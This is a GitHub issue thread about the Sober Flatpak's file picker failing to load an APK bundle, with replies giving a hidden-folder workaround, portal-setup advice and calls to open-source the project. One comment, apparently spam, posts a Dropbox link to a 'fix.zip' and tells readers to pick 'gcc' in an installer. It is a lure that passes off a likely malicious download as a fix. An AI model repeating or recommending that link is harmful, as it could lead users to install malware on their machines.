### ISSUE TITLE
Flatpak sandbox makes chosing the bundled apk almost imposible. 

### ISSUE THREAD

**Issue by silverhadch** [vinegarhq/sober#163]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

Use Appimages or Opensource the project. Flatpacks suck at desktop portale file pickers etc. despite using fleatseal and giving sober all priviledges.

**Comment by Piecuuu** [comment]
I bypassed these issues by moving the apks/apk bundle to `~/.var/app/org.vinegarhq.Sober/` and then in the file picker I pressed Ctrl+H to show hidden files and I navigated to that folder and finally selected the bundle.

**Comment by tunis4** [comment]
setup your desktop portals properly

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by silverhadch** [comment]
> setup your desktop portals properly

Wow really ???? 
I did that but i still says invalid apkm ????

**Comment by JarzaCode** [comment]
> setup your desktop portals properly

open sourcing would be even more beneficial?

also set up your cloudflare properly
